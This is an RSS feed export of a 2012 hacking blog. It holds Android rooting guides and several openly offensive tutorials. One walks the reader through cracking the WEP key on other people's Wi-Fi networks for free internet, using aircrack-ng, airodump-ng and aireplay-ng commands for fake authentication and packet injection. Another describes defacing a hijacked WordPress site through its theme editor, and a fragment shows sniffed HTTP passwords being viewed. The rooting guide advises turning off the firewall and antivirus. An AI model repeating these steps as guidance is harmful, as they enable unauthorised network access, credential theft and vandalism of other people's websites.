&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2QL7tZSjc92byw_jYUoJofz0YnUj5_y_RTwO-Gic5zQi6pXE5E-wxkgF-aWl6NLWbgtCWbzRg5CiUywieivwvA2kYypwB6Rh96fkay3ZHNuecURvvHrtItuyXXIK492y4-r4snGPF0A/s1600/sniff4.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="354" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2QL7tZSjc92byw_jYUoJofz0YnUj5_y_RTwO-Gic5zQi6pXE5E-wxkgF-aWl6NLWbgtCWbzRg5CiUywieivwvA2kYypwB6Rh96fkay3ZHNuecURvvHrtItuyXXIK492y4-r4snGPF0A/s640/sniff4.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
To view the captured passwords, click on the &lt;b style="color: red;"&gt;"Passwords" &lt;/b&gt;tab from the lower tabs and click on HTTP in the Left pane. You can see the captured username and passwords in the right pane along with the URL of the page where the password was input.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Thankz For Reading Keep Visit &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;span style="color: red;"&gt;www.indicyborg.blogspot.in&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;br /&gt;
&lt;span class="st" dir="ltr"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="st" dir="ltr"&gt;&lt;em&gt;&lt;/em&gt;&lt;/span&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhIzOhMpeQ5fk5yT_fY_QuSQTftSzJh0dtQ8vSBAyUTxq5EDJ7W0wEOgdhSFEN210wcNt0wparLrhjj2YKPGJoaBsY8Vka4CEL_qbQE5pox0_cjTCU7lYpSmRDiO2xVvJcemJ8vsuRz6Q/s72-c/sniff.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>HTC Wildfire S Rooted [Hacks]</title><link>http://indicyborg.blogspot.com/2012/08/htc-wildfire-s-rooted-hacks.html</link><category>Android</category><category>Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Sat, 11 Aug 2012 04:00:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-759707069249457173</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;b&gt;HTC Wildfire S&lt;/b&gt; is all so known as &lt;b style="color: red;"&gt;HTC PG76110&lt;/b&gt; which runs on &lt;b&gt;Android 2.3.5&lt;/b&gt; and having&lt;b&gt; 600 MHz&lt;/b&gt; &lt;b&gt;ARM 11 processor &lt;/b&gt;and chipset of &lt;b&gt;Qulacomm MSM7227&lt;/b&gt;. &lt;b&gt;All the users of HTC Wildfire S can now root their phone. To root the device you need to custom recovery installed in the device.&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizbHUb7315v9N6_S-L8Zgxxa9oGkYcy91xUzctjrzG6r8MsAy2oqhdcqBhiRaCROysbT8DkndbB2tJ2usQwL8JvkLqTq4sEPg78Ot154-zJ_UnR3o1mWjV1yXhkjGQijdBltJq9YwJKg/s1600/htc-wildfire-s-rooted.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizbHUb7315v9N6_S-L8Zgxxa9oGkYcy91xUzctjrzG6r8MsAy2oqhdcqBhiRaCROysbT8DkndbB2tJ2usQwL8JvkLqTq4sEPg78Ot154-zJ_UnR3o1mWjV1yXhkjGQijdBltJq9YwJKg/s400/htc-wildfire-s-rooted.jpg" width="263" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Pre-Requisites&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="color: red;"&gt;&lt;span style="color: black;"&gt;-&amp;gt;&lt;/span&gt;&lt;/span&gt;&lt;a href="http://www.htcdev.com/bootloader/"&gt;&lt;b style="color: red;"&gt;Unlocked bootloader of HTC Wildfire S&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
-&amp;gt;Custom recovery image&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;-&amp;gt;&lt;a href="http://www.mediafire.com/?p2p88udo32m9xcg"&gt;&lt;b style="color: red;"&gt;ClockworkMod Recovery 5.0.2.6&lt;/b&gt;&lt;/a&gt; &lt;b&gt;(recommended)&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;-&amp;gt;&lt;a href="http://forum.xda-developers.com/attachment.php?attachmentid=672518&amp;amp;d=1312136127"&gt;&lt;b style="color: red;"&gt;Custom recovery image&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1.&lt;/b&gt;The battery power of the Smartphone must be 80% at least, so that it keeps the device active all through procedure.&lt;br /&gt;
&lt;b&gt;2.&lt;/b&gt;You must keep backups of all data separately before rooting your device.&lt;br /&gt;
&lt;b&gt;3.&lt;/b&gt;Disable the firewall and anti-virus software to avoid interruption.&lt;br /&gt;
&lt;b&gt;4.&lt;/b&gt;Set microSD card to FAT32 file system.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;How to flash custom recovery and root your HTC Wildfire S&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Step 1:&lt;/b&gt; Download the above links on your computer and extract the files.&lt;br /&gt;
&lt;b&gt;Step 2: &lt;/b&gt;Via USB cable connect your device to your computer and transfer the PG76IMG.zip file to the phone’s SD card.&lt;br /&gt;
&lt;b&gt;Step 3:&lt;/b&gt; After that detach your Smartphone from the computer and disable the Fastboot on your phone by going to Settings then power.&lt;br /&gt;
&lt;b&gt;Step 4: &lt;/b&gt;Now switch off the device and reboot it to HBOOT mode by both the Volume Down and Power buttons until the screen appears.&lt;br /&gt;
&lt;b&gt;Step 5: &lt;/b&gt;Wait for few seconds to detect the recovery image by phone and then as you see the message to start update, use the volume up key to initiate update.&lt;br /&gt;
&lt;b&gt;Step 6:&lt;/b&gt; Press the Power button to reboot the phone after the installation is complete.&lt;br /&gt;
&lt;b&gt;Step 7:&lt;/b&gt; Use the USB cable to connect your device after it gets fully booted.&lt;br /&gt;
&lt;b&gt;Step 8:&lt;/b&gt; From the phone’s SD card delete PG76IMG.zip file and copy the root.zip file.&lt;br /&gt;
&lt;b&gt;Step 9:&lt;/b&gt; Again unplug the phone and turn off the device.&lt;br /&gt;
&lt;b&gt;Step 10:&lt;/b&gt; Hold the Volume Down Key and Power buttons until you see HBOOT screen on phone. You must use the Volume keys for navigation and to select use Power button.&lt;br /&gt;
&lt;b&gt;Step 11:&lt;/b&gt;&amp;nbsp; In the recovery menu select install zip from sd card then select choose zip from sd card and finally select root.zip file.&lt;br /&gt;
&lt;b&gt;Step 12: &lt;/b&gt;Confirm by selecting Yes and then the rooting procedure will start by script.&lt;br /&gt;
&lt;b&gt;Step 13:&lt;/b&gt; When all get finished the go back to the main menu and then select power off.&lt;br /&gt;
&lt;b&gt;Step 14:&lt;/b&gt; Power on the phone and enjoy the rooted HTC Wildfire S. Superuser, BusyBox, and su binary will also be installed along with it.&lt;br /&gt;
&lt;br /&gt;
Your HTC Wildfire S is successfully rooted and installed with custom recovery. If you counter any error during Superuser app then clear all the data from it and afterwards run the application from the app drawer. It is advised to update su binary to prevent force close error in the app. You may also go for&lt;a href="https://play.google.com/store/apps/details?id=com.noshufou.android.su"&gt;&lt;b style="color: red;"&gt; latest version of Superuser&lt;/b&gt;&lt;/a&gt; from the Google Play Store.&lt;br /&gt;
................................................................................&lt;br /&gt;
&lt;b&gt;Keep Visiting :-&lt;/b&gt; &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;b style="color: red;"&gt;www.indicyborg.blogspot.in&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEizbHUb7315v9N6_S-L8Zgxxa9oGkYcy91xUzctjrzG6r8MsAy2oqhdcqBhiRaCROysbT8DkndbB2tJ2usQwL8JvkLqTq4sEPg78Ot154-zJ_UnR3o1mWjV1yXhkjGQijdBltJq9YwJKg/s72-c/htc-wildfire-s-rooted.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><enclosure length="3670131" type="application/octet-stream" url="http://forum.xda-developers.com/attachment.php?attachmentid=672518&amp;amp;d=1312136127"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>HTC Wildfire S is all so known as HTC PG76110 which runs on Android 2.3.5 and having 600 MHz ARM 11 processor and chipset of Qulacomm MSM7227. All the users of HTC Wildfire S can now root their phone. To root the device you need to custom recovery installed in the device. Pre-Requisites -&amp;gt;Unlocked bootloader of HTC Wildfire S -&amp;gt;Custom recovery image &amp;nbsp;-&amp;gt;ClockworkMod Recovery 5.0.2.6 (recommended) &amp;nbsp;-&amp;gt;Custom recovery image 1.The battery power of the Smartphone must be 80% at least, so that it keeps the device active all through procedure. 2.You must keep backups of all data separately before rooting your device. 3.Disable the firewall and anti-virus software to avoid interruption. 4.Set microSD card to FAT32 file system. How to flash custom recovery and root your HTC Wildfire S Step 1: Download the above links on your computer and extract the files. Step 2: Via USB cable connect your device to your computer and transfer the PG76IMG.zip file to the phone’s SD card. Step 3: After that detach your Smartphone from the computer and disable the Fastboot on your phone by going to Settings then power. Step 4: Now switch off the device and reboot it to HBOOT mode by both the Volume Down and Power buttons until the screen appears. Step 5: Wait for few seconds to detect the recovery image by phone and then as you see the message to start update, use the volume up key to initiate update. Step 6: Press the Power button to reboot the phone after the installation is complete. Step 7: Use the USB cable to connect your device after it gets fully booted. Step 8: From the phone’s SD card delete PG76IMG.zip file and copy the root.zip file. Step 9: Again unplug the phone and turn off the device. Step 10: Hold the Volume Down Key and Power buttons until you see HBOOT screen on phone. You must use the Volume keys for navigation and to select use Power button. Step 11:&amp;nbsp; In the recovery menu select install zip from sd card then select choose zip from sd card and finally select root.zip file. Step 12: Confirm by selecting Yes and then the rooting procedure will start by script. Step 13: When all get finished the go back to the main menu and then select power off. Step 14: Power on the phone and enjoy the rooted HTC Wildfire S. Superuser, BusyBox, and su binary will also be installed along with it. Your HTC Wildfire S is successfully rooted and installed with custom recovery. If you counter any error during Superuser app then clear all the data from it and afterwards run the application from the app drawer. It is advised to update su binary to prevent force close error in the app. You may also go for latest version of Superuser from the Google Play Store. ................................................................................ Keep Visiting :- www.indicyborg.blogspot.in</itunes:subtitle><itunes:author>noreply@blogger.com (Akshay)</itunes:author><itunes:summary>HTC Wildfire S is all so known as HTC PG76110 which runs on Android 2.3.5 and having 600 MHz ARM 11 processor and chipset of Qulacomm MSM7227. All the users of HTC Wildfire S can now root their phone. To root the device you need to custom recovery installed in the device. Pre-Requisites -&amp;gt;Unlocked bootloader of HTC Wildfire S -&amp;gt;Custom recovery image &amp;nbsp;-&amp;gt;ClockworkMod Recovery 5.0.2.6 (recommended) &amp;nbsp;-&amp;gt;Custom recovery image 1.The battery power of the Smartphone must be 80% at least, so that it keeps the device active all through procedure. 2.You must keep backups of all data separately before rooting your device. 3.Disable the firewall and anti-virus software to avoid interruption. 4.Set microSD card to FAT32 file system. How to flash custom recovery and root your HTC Wildfire S Step 1: Download the above links on your computer and extract the files. Step 2: Via USB cable connect your device to your computer and transfer the PG76IMG.zip file to the phone’s SD card. Step 3: After that detach your Smartphone from the computer and disable the Fastboot on your phone by going to Settings then power. Step 4: Now switch off the device and reboot it to HBOOT mode by both the Volume Down and Power buttons until the screen appears. Step 5: Wait for few seconds to detect the recovery image by phone and then as you see the message to start update, use the volume up key to initiate update. Step 6: Press the Power button to reboot the phone after the installation is complete. Step 7: Use the USB cable to connect your device after it gets fully booted. Step 8: From the phone’s SD card delete PG76IMG.zip file and copy the root.zip file. Step 9: Again unplug the phone and turn off the device. Step 10: Hold the Volume Down Key and Power buttons until you see HBOOT screen on phone. You must use the Volume keys for navigation and to select use Power button. Step 11:&amp;nbsp; In the recovery menu select install zip from sd card then select choose zip from sd card and finally select root.zip file. Step 12: Confirm by selecting Yes and then the rooting procedure will start by script. Step 13: When all get finished the go back to the main menu and then select power off. Step 14: Power on the phone and enjoy the rooted HTC Wildfire S. Superuser, BusyBox, and su binary will also be installed along with it. Your HTC Wildfire S is successfully rooted and installed with custom recovery. If you counter any error during Superuser app then clear all the data from it and afterwards run the application from the app drawer. It is advised to update su binary to prevent force close error in the app. You may also go for latest version of Superuser from the Google Play Store. ................................................................................ Keep Visiting :- www.indicyborg.blogspot.in</itunes:summary><itunes:keywords>Android, Hacking</itunes:keywords></item><item><title>How to Root and Unroot LG Optimus S LS670 [Hacks]</title><link>http://indicyborg.blogspot.com/2012/08/how-to-root-and-unroot-lg-optimus-s.html</link><category>Android</category><category>Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Sat, 11 Aug 2012 03:51:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-6329445254770229444</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-mEkC6Vuq95HuuYsNNpa7oDmMZDU6soa94d6Efi3dbGsgnEPLqZEkePKQ9PQwXO2QozMfYnbmRFr16cwPIy9_ecVDNOqSsAdwVdSD0vrhi7egLQWIbDZNRGgmnXljIdUdr-JdO-VPg/s1600/root_LG_Optimus_S.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="363" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-mEkC6Vuq95HuuYsNNpa7oDmMZDU6soa94d6Efi3dbGsgnEPLqZEkePKQ9PQwXO2QozMfYnbmRFr16cwPIy9_ecVDNOqSsAdwVdSD0vrhi7egLQWIbDZNRGgmnXljIdUdr-JdO-VPg/s400/root_LG_Optimus_S.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;The LG Optimus S is a good smartphone. The device could be considered one of those entry-level Android smartphones. It has been out for quite some time now and it has already received a lot of praise from Internet reviews and first-hand users. They claim that the Optimus S is the best smartphone in its category.&lt;br /&gt;
&lt;br /&gt;
What makes this Android gadget stand out is the fact that it has a sturdy build, its 600 MHz processor is able to handle Android 2.2 very well, and it’s the cheapest among the first Sprint ID smartphones.&lt;br /&gt;
Since it is a Sprint ID smartphone, the LG Optimus S contains all the Sprint ID bloatware. Most of the time, the software is not really useful and many of you wish that network providers like Sprint didn’t preload such apps into their phones. But, since that is not how it works in the real world, then we just have to find some ways to remove the bloatware ourselves.&lt;br /&gt;
Rooting an Android device is typically the first step in removing bloatware. This process will give users more control over the device. So, if you are planning to root your LG Optimus S to get rid of Sprint ID bloatware, continue reading to know how.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Requirements&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Download and install the .net Framework. Part of this utility software is needed by the rooting application. Get the .net &lt;a href="http://www.microsoft.com/en-us/download/details.aspx?id=17851"&gt;&lt;b style="color: red;"&gt;Framework here&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&amp;nbsp;The rooting application will also need the Visual C++ 2008 Redistribute Package. You can get &lt;a href="http://www.microsoft.com/en-us/download/details.aspx?id=29"&gt;&lt;b style="color: red;"&gt;this here&lt;/b&gt;&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
This process will need a Windows PC which runs either Windows Vista or Windows 7.&lt;br /&gt;
&amp;nbsp;&amp;nbsp;&amp;nbsp; It is also best to have a fully charged battery before you perform this process.&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;Instructions&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;1.Download the rooting application from&lt;a href="http://www.androphiles.com/files/android/dwalton/GingersnapRootUtilityForWindows.zip"&gt;&lt;b style="color: red;"&gt; here&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;
&amp;nbsp;2.Unzip the downloaded file to have access to the main rooting application.&lt;br /&gt;
&amp;nbsp;3.Download and install the USB driver for the device from&lt;a href="http://www.lg-phones.org/wp-content/uploads/LG_USB_Drivers_All_4.9.7.zip"&gt;&lt;b style="color: red;"&gt; here&lt;/b&gt;&lt;/a&gt;. If you have successfully connected the device to your PC before, you don’t need to do this.&lt;br /&gt;
&amp;nbsp;4.Enable USB debugging in the Optimus S. To do this, just follow this path &lt;b style="color: red;"&gt;Settings &amp;gt; Applications &amp;gt; Development and check the box for USB Debugging.&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;5.Connect the device to your PC via USB cable.&lt;br /&gt;
&amp;nbsp;6.Open the notifications window on the device and make sure “USB debugging connected” is listed under “Ongoing”.&lt;br /&gt;
&amp;nbsp;7.Go to the folder where you unzipped the rooting files. Right click on “Gingersnap.exe” and then choose “Run as administrator”.&lt;br /&gt;
&amp;nbsp;8.Click on the Root button to complete the rooting process. And, if you just came back here to Unroot the Optimus S, then feel free to click the Unroot button.&lt;br /&gt;
&lt;br /&gt;
You can now remove the bloatware on your Optimus S to free up some space and get rid of unwanted stuff. Doing this one, though, is a totally different topic. But, then again, you’re already one step closer since the device is already rooted. And, not just that–you can now do more things with your Optimus S like probably installing CyanogenMod.&lt;br /&gt;
...............................................................................&lt;br /&gt;
Keep Visiting Us :- &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;b style="color: red;"&gt;www.indicyborg.blogspot.in&lt;/b&gt;&lt;/a&gt;&lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiK-mEkC6Vuq95HuuYsNNpa7oDmMZDU6soa94d6Efi3dbGsgnEPLqZEkePKQ9PQwXO2QozMfYnbmRFr16cwPIy9_ecVDNOqSsAdwVdSD0vrhi7egLQWIbDZNRGgmnXljIdUdr-JdO-VPg/s72-c/root_LG_Optimus_S.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Wireless Wi-Fi Modem Network Hacking Complete Tutorial</title><link>http://indicyborg.blogspot.com/2012/08/wireless-wi-fi-modem-network-hacking.html</link><category>Hacking</category><category>Wifi Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 10 Aug 2012 05:05:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-52558682642903140</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdgnJglUQ7XyzUrKcyMqhvbihBIE6OFy5sHCGyh4xJhNnOQAEpnEhzJjj2mMbsYrU8ArV41DULIwvVYlF90pajVvOjWnoA6FfjDLes-G_zhyphenhyphenzjFLiLg52ZMWn09aPAZJhoDpf0-OBgw/s1600/wifi-hacking.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="273" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdgnJglUQ7XyzUrKcyMqhvbihBIE6OFy5sHCGyh4xJhNnOQAEpnEhzJjj2mMbsYrU8ArV41DULIwvVYlF90pajVvOjWnoA6FfjDLes-G_zhyphenhyphenzjFLiLg52ZMWn09aPAZJhoDpf0-OBgw/s400/wifi-hacking.png" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Many of the friends ask me about how to hack wifi network .so here is the tutorial that will explain how to hack wifi.&lt;br /&gt;
In our daily life some time our laptop catching so many wi-fi signals but none of them is accessible..and we think “I wish I could some how break the password and access free internet”.&lt;br /&gt;
if you are thinking like that than this tutorial will definitely help you in cracking password of wi-fi network for free internet.&lt;br /&gt;
&lt;b style="color: red;"&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Tutorial on hacking wi-fi Network&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
First of all you need to scan for available wireless networks.&lt;br /&gt;
&lt;br /&gt;
you can use“NetStumbler” or "Kismet" for Windows and Linux and KisMac for Mac&lt;br /&gt;
Below is a screenshot of NetStumbler.. It will show you a list of all the wireless access points in your range.&lt;br /&gt;
&lt;br /&gt;
It’ll also show how the Wi-fi network is secured..&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: blue;"&gt;Now the main par comes The two most common encryption types are:&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;1) WEP (Wire Equivalent Privacy )&lt;br /&gt;
&lt;br /&gt;
2) WAP(Wireless Application Protocol)&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
WEP allows a hacker to crack a WEP key easily whereas WAP is currently the most secure and best option to secure a wi-fi network&lt;br /&gt;
&lt;br /&gt;
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.&lt;br /&gt;
&lt;b style="color: red;"&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;How to Crack WEP&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is the practically tested way to hack wi-fi network.&lt;br /&gt;
&lt;br /&gt;
To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP.&lt;br /&gt;
&lt;br /&gt;
BackTrack have lots of preinstalled softwares but for this time&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: blue;"&gt;The tools we will be using on Backtrack are:&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;a)Kismet – a wireless network detector&lt;br /&gt;
b)airodump – captures packets from a wireless router&lt;br /&gt;
c)aireplay – forges ARP requests&lt;br /&gt;
d)aircrack – decrypts the WEP keys&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Follow the steps One by One&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;1)&lt;/b&gt; First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It may ask you for the appropriate adapter which in my case is ath0. You can see your device’s name by typing in the command iwconfig.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;2)&lt;/b&gt; To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in monitor mode.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;3)&lt;/b&gt; In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN 0=OTHER(usually WAP).&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;4)&lt;/b&gt; Once you find an access point, open a text document and paste in the networks broadcast name (essid), its mac address (bssid) and its channel number. To get the above information, use the arrow keys to select an access point and hit to get more information about it.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;5)&lt;/b&gt; The next step is to start collecting data from the access point with airodump. Open up a new terminal and start airodump by typing in the command:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;airodump-ng -c [channel#] -w [filename] –bssid [bssid] [device]&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In the above command airodump-ng starts the program, the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes after –bssid. The command ends with the device name. Make sure to leave out the brackets.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;6)&lt;/b&gt; Leave the above running and open another terminal. Next we will generate some fake packets to the target access point so that the speed of the data output will increase. Put in the following command:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;aireplay-ng -1 0 -a [bssid] -h 00:11:22:33:44:55:66 -e [essid] [device]&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In the above command we are using the airplay-ng program. The -1 tells the program the specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;7)&lt;/b&gt; Now, we will force the target access point to send out a huge amount of packets that we will be able to take advantage of by using them to attempt to crack the WEP key. Once the following command is executed, check your airodump-ng terminal and you should see the ARP packet count to start to increase. The command is:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;aireplay-ng -3 -b [bssid] -h 00:11:22:33:44:5:66 [device]&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In this command, the -3 tells the program the specific type of attack which in this case is packet injection, -b is the MAC address of the target access point, -h is your wireless adapters MAC address, and the wireless adapter device name goes at the end.&lt;br /&gt;
Once you have collected around 50k-500k packets, you may begin the attempt to break the WEP key. The command to begin the cracking process is:&lt;br /&gt;
&lt;br /&gt;
&lt;b style="color: red;"&gt;aircrack-ng -a 1 -b [bssid] -n 128 [filename].ivs&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then leave it out. This should crack the WEP key within seconds. The more packets you capture, the bigger chance you have of cracking the WEP key.&lt;br /&gt;
&lt;br /&gt;
Now you have learn how to hack wi-fi network.&lt;br /&gt;
This is the most practically way to hack wi-fi network working genuinely.Always put your try and i am sure this tutorial is helpful to you.&lt;br /&gt;
&lt;br /&gt;
please share if if you like and keep viewing &lt;a href="http://www.indicyborg.blogspot.in/"&gt;&lt;b style="color: red;"&gt;www.Indicyborg.blogspot.in&lt;/b&gt;&lt;/a&gt; thankyou form admin.:) &lt;/div&gt;</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHdgnJglUQ7XyzUrKcyMqhvbihBIE6OFy5sHCGyh4xJhNnOQAEpnEhzJjj2mMbsYrU8ArV41DULIwvVYlF90pajVvOjWnoA6FfjDLes-G_zhyphenhyphenzjFLiLg52ZMWn09aPAZJhoDpf0-OBgw/s72-c/wifi-hacking.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Quick Tips About Wordpress Defacing</title><link>http://indicyborg.blogspot.com/2012/08/quick-tips-about-wordpress-defacing.html</link><category>Hacking</category><category>Website Hacking</category><category>WordPress Hacking</category><author>noreply@blogger.com (Akshay)</author><pubDate>Fri, 10 Aug 2012 04:51:00 -0700</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-1305573116189186826.post-8284193427195828471</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51rwboLY2HSk5aAStO22NhzXMbOASI06Ydyev6IikzdGBJbGUu4FdxLgT9HyaluG-TETGxYfNHAUtKsGQ3u4uvNjHD9HTGB7I82MuMz8_WHhoetfCTLn1bsan7rj9j2rfoR16fsNfPA/s1600/wp1.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj51rwboLY2HSk5aAStO22NhzXMbOASI06Ydyev6IikzdGBJbGUu4FdxLgT9HyaluG-TETGxYfNHAUtKsGQ3u4uvNjHD9HTGB7I82MuMz8_WHhoetfCTLn1bsan7rj9j2rfoR16fsNfPA/s1600/wp1.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;b style="color: red;"&gt;Wordpress Defacing without uploading Shell&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
usually after gaining admin acess on wordpress website we upload shell on website, its takes some extra time, even you can deface wordpress's index page without uploading shell !&lt;br /&gt;
Goto wordpress dashboard than theme editor and you'll see 2-3 thmes there like twenty ten and twenly eleven.&lt;br /&gt;
Look there for active Theme on That website and edit index.php of that theme. and you'll see your deface pages on website's home Page.&lt;br /&gt;
&lt;br /&gt;
